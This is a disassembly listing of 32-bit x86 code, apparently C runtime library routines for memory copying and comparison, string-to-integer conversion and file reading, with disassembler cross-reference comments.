cmp ecx, 8
jb short loc_42244C
rep movsd
jmp off_422538[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4224CC dd offset loc_42252F ; DATA XREF: sub_4223F0:loc_42244C�r
dd offset loc_42251C
dd offset loc_422514
dd offset loc_42250C
dd offset loc_422504
dd offset loc_4224FC
dd offset loc_4224F4
dd offset loc_4224EC
; ---------------------------------------------------------------------------
loc_4224EC: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4224F4: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4224FC: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_422504: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_42250C: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_422514: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_42251C: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42252F: ; CODE XREF: sub_4223F0:loc_42244C�j
; DATA XREF: sub_4223F0:off_4224CC�o
jmp off_422538[edx*4]
; ---------------------------------------------------------------------------
align 4
off_422538 dd offset loc_422548 ; DATA XREF: sub_4223F0+35�r
; sub_4223F0+92�r ...
dd offset loc_422550
dd offset loc_42255C
dd offset loc_422570
; ---------------------------------------------------------------------------
loc_422548: ; CODE XREF: sub_4223F0+35�j
; sub_4223F0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_422550: ; CODE XREF: sub_4223F0+35�j
; sub_4223F0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42255C: ; CODE XREF: sub_4223F0+35�j
; sub_4223F0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_422570: ; CODE XREF: sub_4223F0+35�j
; sub_4223F0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_422588: ; CODE XREF: sub_4223F0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4225BC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4225B0
std
rep movsd
cld
jmp off_4226D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4225B0: ; CODE XREF: sub_4223F0+1B1�j
; sub_4223F0+208�j ...
neg ecx
jmp off_422680[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4225BC: ; CODE XREF: sub_4223F0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4225D4
and eax, 3
sub ecx, eax
jmp dword ptr loc_4225D4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4225D4: ; CODE XREF: sub_4223F0+1D6�j
; DATA XREF: sub_4223F0+1DD�r
jmp off_4226D0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4225E7+1
; ---------------------------------------------------------------------------
or [esi], ah
inc edx
add [eax], dh
db 26h
inc edx
loc_4225E7: ; DATA XREF: sub_4223F0+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4225B0
std
rep movsd
cld
jmp off_4226D0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4225B0
std
rep movsd
cld
jmp off_4226D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4225B0
std
rep movsd
cld
jmp off_4226D0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_422684
dd offset loc_42268C
dd offset loc_422694
dd offset loc_42269C
dd offset loc_4226A4
dd offset loc_4226AC
dd offset loc_4226B4
off_422680 dd offset loc_4226C7 ; DATA XREF: sub_4223F0+1C2�r
; ---------------------------------------------------------------------------
loc_422684: ; DATA XREF: sub_4223F0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_42268C: ; DATA XREF: sub_4223F0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_422694: ; DATA XREF: sub_4223F0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_42269C: ; DATA XREF: sub_4223F0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4226A4: ; DATA XREF: sub_4223F0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4226AC: ; DATA XREF: sub_4223F0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4226B4: ; DATA XREF: sub_4223F0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4226C7: ; CODE XREF: sub_4223F0+1C2�j
; DATA XREF: sub_4223F0:off_422680�o
jmp off_4226D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4226D0 dd offset loc_4226E0 ; DATA XREF: sub_4223F0+1B7�r
; sub_4223F0:loc_4225D4�r ...
dd offset loc_4226E8
dd offset loc_4226F8
dd offset loc_42270C
; ---------------------------------------------------------------------------
loc_4226E0: ; CODE XREF: sub_4223F0+1B7�j
; sub_4223F0:loc_4225D4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4226E8: ; CODE XREF: sub_4223F0+1B7�j
; sub_4223F0:loc_4225D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4226F8: ; CODE XREF: sub_4223F0+1B7�j
; sub_4223F0:loc_4225D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42270C: ; CODE XREF: sub_4223F0+1B7�j
; sub_4223F0:loc_4225D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4223F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422725 proc near ; CODE XREF: sub_4015FC+44�p
; sub_402190+27A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_422120
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_425A04
add esp, 10h
leave
retn
sub_422725 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_422760 proc near ; CODE XREF: sub_4016B4+1B�p
; sub_4016B4+39�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_4227AC
loc_422770: ; CODE XREF: sub_422760+3C�j
; sub_422760+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_4227A4
or al, al
jz short loc_4227A0
cmp ah, [ecx+1]
jnz short loc_4227A4
or ah, ah
jz short loc_4227A0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_4227A4
or al, al
jz short loc_4227A0
cmp ah, [ecx+3]
jnz short loc_4227A4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_422770
mov edi, edi
loc_4227A0: ; CODE XREF: sub_422760+18�j
; sub_422760+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4227A4: ; CODE XREF: sub_422760+14�j
; sub_422760+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4227AC: ; CODE XREF: sub_422760+E�j
test edx, 1
jz short loc_4227C8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_4227A4
inc ecx
or al, al
jz short loc_4227A0
test edx, 2
jz short loc_422770
loc_4227C8: ; CODE XREF: sub_422760+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_4227A4
or al, al
jz short loc_4227A0
cmp ah, [ecx+1]
jnz short loc_4227A4
or ah, ah
jz short loc_4227A0
add ecx, 2
jmp short loc_422770
sub_422760 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4227F0 proc near ; CODE XREF: sub_401A7A+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_42283C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_42283D
test eax, 1
jz short loc_42281D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_42286A
inc esi
inc edi
dec eax
jz short loc_42283A
loc_42281D: ; CODE XREF: sub_4227F0+20�j
; sub_4227F0+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_42286A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_42286A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_42281D
loc_42283A: ; CODE XREF: sub_4227F0+2B�j
; sub_4227F0+84�j
pop edi
pop esi
locret_42283C: ; CODE XREF: sub_4227F0+6�j
retn
; ---------------------------------------------------------------------------
loc_42283D: ; CODE XREF: sub_4227F0+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_422872
repe cmpsd
jz short loc_422872
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_422865
cmp ch, dh
jnz short loc_422865
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_422865
cmp ch, dh
loc_422865: ; CODE XREF: sub_4227F0+63�j
; sub_4227F0+67�j ...
mov eax, 0
loc_42286A: ; CODE XREF: sub_4227F0+26�j
; sub_4227F0+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_422872: ; CODE XREF: sub_4227F0+55�j
; sub_4227F0+59�j
test eax, eax
jz short loc_42283A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_422865
dec eax
jz short loc_422899
cmp dh, ch
jnz short loc_422865
dec eax
jz short loc_422899
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_422865
dec eax
loc_422899: ; CODE XREF: sub_4227F0+8F�j
; sub_4227F0+96�j
pop edi
pop esi
retn
sub_4227F0 endp
; =============== S U B R O U T I N E =======================================
sub_42289C proc near ; CODE XREF: sub_427054+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4228B3
add esp, 10h
retn
sub_42289C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4228B3 proc near ; CODE XREF: sub_42289C+E�p
; sub_422AB8+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_4228CB: ; CODE XREF: sub_4228B3+46�j
cmp dword_449A44, 1
jle short loc_4228E3
movzx eax, bl
push 8
push eax
call sub_42653A
pop ecx
pop ecx
jmp short loc_4228F2
; ---------------------------------------------------------------------------
loc_4228E3: ; CODE XREF: sub_4228B3+1F�j
mov ecx, off_449838
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_4228F2: ; CODE XREF: sub_4228B3+2E�j
test eax, eax
jz short loc_4228FB
mov bl, [esi]
inc esi
jmp short loc_4228CB
; ---------------------------------------------------------------------------
loc_4228FB: ; CODE XREF: sub_4228B3+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_422909
or [ebp+arg_C], 2
jmp short loc_42290E
; ---------------------------------------------------------------------------
loc_422909: ; CODE XREF: sub_4228B3+4E�j
cmp bl, 2Bh
jnz short loc_422914
loc_42290E: ; CODE XREF: sub_4228B3+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_422914: ; CODE XREF: sub_4228B3+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_422AA8
cmp eax, 1
jz loc_422AA8
cmp eax, 24h
jg loc_422AA8
push 10h
test eax, eax
pop ecx
jnz short loc_42295C
cmp bl, 30h
jz short loc_422946
mov [ebp+arg_8], 0Ah
jmp short loc_422978
; ---------------------------------------------------------------------------
loc_422946: ; CODE XREF: sub_4228B3+88�j
mov al, [esi]
cmp al, 78h
jz short loc_422959
cmp al, 58h
jz short loc_422959
mov [ebp+arg_8], 8
jmp short loc_422978
; ---------------------------------------------------------------------------
loc_422959: ; CODE XREF: sub_4228B3+97�j
; sub_4228B3+9B�j
mov [ebp+arg_8], ecx
loc_42295C: ; CODE XREF: sub_4228B3+83�j
cmp [ebp+arg_8], ecx
jnz short loc_422978
cmp bl, 30h
jnz short loc_422978
mov al, [esi]
cmp al, 78h
jz short loc_422970
cmp al, 58h
jnz short loc_422978
loc_422970: ; CODE XREF: sub_4228B3+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_422978: ; CODE XREF: sub_4228B3+91�j
; sub_4228B3+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_422988: ; CODE XREF: sub_4228B3+16C�j
cmp dword_449A44, 1
movzx esi, bl
jle short loc_4229A0
push 4
push esi
call sub_42653A
pop ecx
pop ecx
jmp short loc_4229AB
; ---------------------------------------------------------------------------
loc_4229A0: ; CODE XREF: sub_4228B3+DF�j
mov eax, off_449838
mov al, [eax+esi*2]
and eax, 4
loc_4229AB: ; CODE XREF: sub_4228B3+EB�j
test eax, eax
jz short loc_4229B7
movsx ecx, bl
sub ecx, 30h
jmp short loc_4229E9
; ---------------------------------------------------------------------------
loc_4229B7: ; CODE XREF: sub_4228B3+FA�j
cmp dword_449A44, 1
jle short loc_4229CB
push edi
push esi
call sub_42653A
pop ecx
pop ecx
jmp short loc_4229D6
; ---------------------------------------------------------------------------
loc_4229CB: ; CODE XREF: sub_4228B3+10B�j
mov eax, off_449838
mov ax, [eax+esi*2]
and eax, edi
loc_4229D6: ; CODE XREF: sub_4228B3+116�j
test eax, eax
jz short loc_422A24
movsx eax, bl
push eax
call sub_4248E0
pop ecx
mov ecx, eax
sub ecx, 37h
loc_4229E9: ; CODE XREF: sub_4228B3+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_422A24
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_422A0E
jnz short loc_422A08
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_422A0E
loc_422A08: ; CODE XREF: sub_4228B3+147�j
or [ebp+arg_C], 4
jmp short loc_422A17
; ---------------------------------------------------------------------------
loc_422A0E: ; CODE XREF: sub_4228B3+145�j
; sub_4228B3+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_422A17: ; CODE XREF: sub_4228B3+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_422988
; ---------------------------------------------------------------------------
loc_422A24: ; CODE XREF: sub_4228B3+125�j
; sub_4228B3+139�j
mov eax, [ebp+arg_C]
dec [ebp+var_4]
mov ebx, [ebp+arg_4]
test al, 8
jnz short loc_422A41
test ebx, ebx
jz short loc_422A3B
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_422A3B: ; CODE XREF: sub_4228B3+180�j
and [ebp+var_8], 0
jmp short loc_422A8C
; ---------------------------------------------------------------------------
loc_422A41: ; CODE XREF: sub_4228B3+17C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_422A65
test al, 1
jnz short loc_422A8C
and eax, 2
jz short loc_422A5C
cmp [ebp+var_8], 80000000h
ja short loc_422A65
loc_422A5C: ; CODE XREF: sub_4228B3+19E�j
test eax, eax
jnz short loc_422A8C
cmp [ebp+var_8], esi
jbe short loc_422A8C
loc_422A65: ; CODE XREF: sub_4228B3+195�j
; sub_4228B3+1A7�j
call sub_426528
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_422A7C
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_422A8C
; ---------------------------------------------------------------------------
loc_422A7C: ; CODE XREF: sub_4228B3+1C1�j
mov eax, [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_8], eax
loc_422A8C: ; CODE XREF: sub_4228B3+18C�j
; sub_4228B3+199�j ...
test ebx, ebx
jz short loc_422A95
mov eax, [ebp+var_4]
mov [ebx], eax
loc_422A95: ; CODE XREF: sub_4228B3+1DB�j
test byte ptr [ebp+arg_C], 2
jz short loc_422AA3
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_422AA3: ; CODE XREF: sub_4228B3+1E6�j
mov eax, [ebp+var_8]
jmp short loc_422AB3
; ---------------------------------------------------------------------------
loc_422AA8: ; CODE XREF: sub_4228B3+66�j
; sub_4228B3+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_422AB1
mov [eax], edi
loc_422AB1: ; CODE XREF: sub_4228B3+1FA�j
xor eax, eax
loc_422AB3: ; CODE XREF: sub_4228B3+1F3�j
pop edi
pop esi
pop ebx
leave
retn
sub_4228B3 endp
; =============== S U B R O U T I N E =======================================
sub_422AB8 proc near ; CODE XREF: sub_402190+381�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4228B3
add esp, 10h
retn
sub_422AB8 endp
; =============== S U B R O U T I N E =======================================
sub_422ACF proc near ; CODE XREF: sub_422B5A+4�p
; sub_42D078+1C1�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_422AD7: ; CODE XREF: sub_422ACF+34�j
cmp dword_449A44, 1
jle short loc_422AEF
movzx eax, byte ptr [edi]
push 8
push eax
call sub_42653A
pop ecx
pop ecx
jmp short loc_422AFE
; ---------------------------------------------------------------------------
loc_422AEF: ; CODE XREF: sub_422ACF+F�j
movzx eax, byte ptr [edi]
mov ecx, off_449838
mov al, [ecx+eax*2]
and eax, 8
loc_422AFE: ; CODE XREF: sub_422ACF+1E�j
test eax, eax
jz short loc_422B05
inc edi
jmp short loc_422AD7
; ---------------------------------------------------------------------------
loc_422B05: ; CODE XREF: sub_422ACF+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_422B15
cmp esi, 2Bh
jnz short loc_422B19
loc_422B15: ; CODE XREF: sub_422ACF+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_422B19: ; CODE XREF: sub_422ACF+44�j
xor ebx, ebx
loc_422B1B: ; CODE XREF: sub_422ACF+7B�j
cmp dword_449A44, 1
jle short loc_422B30
push 4
push esi
call sub_42653A
pop ecx
pop ecx
jmp short loc_422B3B
; ---------------------------------------------------------------------------
loc_422B30: ; CODE XREF: sub_422ACF+53�j
mov eax, off_449838
mov al, [eax+esi*2]
and eax, 4
loc_422B3B: ; CODE XREF: sub_422ACF+5F�j
test eax, eax
jz short loc_422B4C
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_422B1B
; ---------------------------------------------------------------------------
loc_422B4C: ; CODE XREF: sub_422ACF+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_422B55
neg eax
loc_422B55: ; CODE XREF: sub_422ACF+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_422ACF endp
; =============== S U B R O U T I N E =======================================
sub_422B5A proc near ; CODE XREF: sub_402190+33D�p
; sub_402190+34B�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_422ACF
pop ecx
retn
sub_422B5A endp
; =============== S U B R O U T I N E =======================================
sub_422B65 proc near ; CODE XREF: sub_40274D+B0�p
; sub_416C0B+1EA�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
jz short loc_422B7A
and dword ptr [esi+0Ch], 0
jmp short loc_422B91
; ---------------------------------------------------------------------------
loc_422B7A: ; CODE XREF: sub_422B65+D�j
push esi
call sub_42483C
push esi
call sub_422B96
push esi
mov edi, eax
call sub_42488E
add esp, 0Ch
loc_422B91: ; CODE XREF: sub_422B65+13�j
mov eax, edi
pop edi
pop esi
retn
sub_422B65 endp
; =============== S U B R O U T I N E =======================================
sub_422B96 proc near ; CODE XREF: sub_422B65+1C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_422BD9
push esi
call sub_42671D
push esi
mov edi, eax
call sub_4266C4
push dword ptr [esi+10h]
call sub_4265E4
add esp, 0Ch
test eax, eax
jge short loc_422BC7
or edi, 0FFFFFFFFh
jmp short loc_422BD9
; ---------------------------------------------------------------------------
loc_422BC7: ; CODE XREF: sub_422B96+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_422BD9
push eax
call sub_4230B3
and dword ptr [esi+1Ch], 0
pop ecx
loc_422BD9: ; CODE XREF: sub_422B96+D�j
; sub_422B96+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_422B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422BE2 proc near ; CODE XREF: sub_40274D+83�p
; sub_417583+26�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
call sub_42483C
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_422C11
push [ebp+arg_C]
mov esi, eax
call sub_42488E
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_422BE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C11 proc near ; CODE XREF: sub_422BE2+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_422C35
xor eax, eax
jmp loc_422CDE
; ---------------------------------------------------------------------------
loc_422C35: ; CODE XREF: sub_422C11+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_422C48
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_422C54
; ---------------------------------------------------------------------------
loc_422C48: ; CODE XREF: sub_422C11+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_422C54
; ---------------------------------------------------------------------------
loc_422C51: ; CODE XREF: sub_422C11+C4�j
mov ecx, [ebp+arg_0]
loc_422C54: ; CODE XREF: sub_422C11+35�j
; sub_422C11+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_422C86
mov eax, [esi+4]
test eax, eax
jz short loc_422C86
cmp ecx, eax
mov edi, ecx
jb short loc_422C6B
mov edi, eax
loc_422C6B: ; CODE XREF: sub_422C11+56�j
push edi
push dword ptr [esi]
push ebx
call sub_4223F0
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_422CD1
; ---------------------------------------------------------------------------
loc_422C86: ; CODE XREF: sub_422C11+49�j
; sub_422C11+50�j
cmp ecx, [ebp+arg_C]
jb short loc_422CB9
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_422C9C
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_422C9C: ; CODE XREF: sub_422C11+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_426902
add esp, 0Ch
test eax, eax
jz short loc_422CE3
cmp eax, 0FFFFFFFFh
jz short loc_422CE9
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_422CD1
; ---------------------------------------------------------------------------
loc_422CB9: ; CODE XREF: sub_422C11+78�j
push esi
call sub_426826
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_422CED
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_422CD1: ; CODE XREF: sub_422C11+73�j
; sub_422C11+A6�j
cmp [ebp+arg_0], 0
jnz loc_422C51
mov eax, [ebp+arg_8]
loc_422CDE: ; CODE XREF: sub_422C11+1F�j
; sub_422C11+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_422CE3: ; CODE XREF: sub_422C11+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_422CED
; ---------------------------------------------------------------------------
loc_422CE9: ; CODE XREF: sub_422C11+9F�j
or dword ptr [esi+0Ch], 20h
loc_422CED: ; CODE XREF: sub_422C11+B2�j
; sub_422C11+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_422CDE
sub_422C11 endp
; =============== S U B R O U T I N E =======================================
sub_422CF9 proc near ; CODE XREF: sub_40274D+4D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42483C
push esi
call sub_422D1B
push esi
mov edi, eax
call sub_42488E
add esp, 0Ch
mov eax, edi
pop edi
pop esi
retn
sub_422CF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D1B proc near ; CODE XREF: sub_422CF9+D�p
; sub_422EA8+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_422D37
mov [edi+4], ebx
loc_422D37: ; CODE XREF: sub_422D1B+17�j
push 1
push ebx
push esi
call sub_426CFC
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_422DA9
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_422D5C
sub eax, [edi+4]
jmp loc_422E77
; ---------------------------------------------------------------------------
loc_422D5C: ; CODE XREF: sub_422D1B+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_422D99
mov ebx, esi
mov ecx, esi
sar ebx, 5
and ecx, 1Fh
mov ebx, dword_6319E0[ebx*4]
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_422DB1
mov ecx, edx
loc_422D8A: ; CODE XREF: sub_422D1B+7C�j
cmp ecx, eax
jnb short loc_422DB1
cmp byte ptr [ecx], 0Ah
jnz short loc_422D96
inc [ebp+var_8]
loc_422D96: ; CODE XREF: sub_422D1B+76�j
inc ecx
jmp short loc_422D8A
; ---------------------------------------------------------------------------
loc_422D99: ; CODE XREF: sub_422D1B+50�j
